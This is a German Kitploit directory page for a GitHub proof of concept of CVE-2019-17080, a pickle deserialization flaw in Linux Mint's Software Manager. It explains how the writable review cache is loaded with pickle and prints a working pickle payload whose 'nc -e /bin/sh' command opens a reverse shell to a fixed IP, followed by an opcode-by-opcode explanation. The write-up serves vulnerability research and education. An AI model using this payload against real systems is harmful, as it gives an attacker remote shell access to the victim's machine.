Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Tools/GitHubGitHub/materaj2/mintinstall-object-injection
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFLernen & BildungBinary-Exploitation
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Repository anzeigen
5vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Der Linux Mint Software Manager (v 7.9.5/9) führt aufgrund einer fehlerhaften Konfiguration zu Objektinjektion und willkürlicher Codeausführung.

mintinsall

Beim Start des Software Managers wird überprüft, ob es neue Kommentare gibt. Wenn ja, werden diese von new-reviews.list heruntergeladen und in eine Datei geschrieben.

code mintinstall.py

Beim ersten Start des Software Managers wird die Klasse ReviewCache() aus dem Modul reviews aufgerufen.

Wie verarbeitet es Daten?

code reviews.py

Wenn die Klasse ReviewCache startet (init), ruft sie die Funktion _load_cache() auf.

Die Load-Cache-Funktion liest die Datei in der Variable REVIEWS_CACHE und deserialisiert die Daten in der Datei mit Hilfe des Pickle-Moduls und speichert einige Werte im Speicher.

Bei der Überprüfung der Datei scheint es, dass ich Schreibrechte habe.

Da wir mit dem Pickle-Modul Serialisierungs-/Deserialisierungsoperationen durchführen können, können wir das Modul mittels der reduce-Methode einbinden und beliebigen Code ausführen.

In diesem Fall, wenn versucht wird, die Datei zu deserialisieren, wird unser schädlicher Code ausgeführt.

cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>> Modulname c{os}
>> Funktion
( >> Markerobjekt 
S >> Bis zum Anführungszeichen lesen und auf den Stack legen
tR. >> Die auf dem Stack befindlichen aufrufen und das Ergebnis auf den Stack legen.

alt-text

Tool herunterladen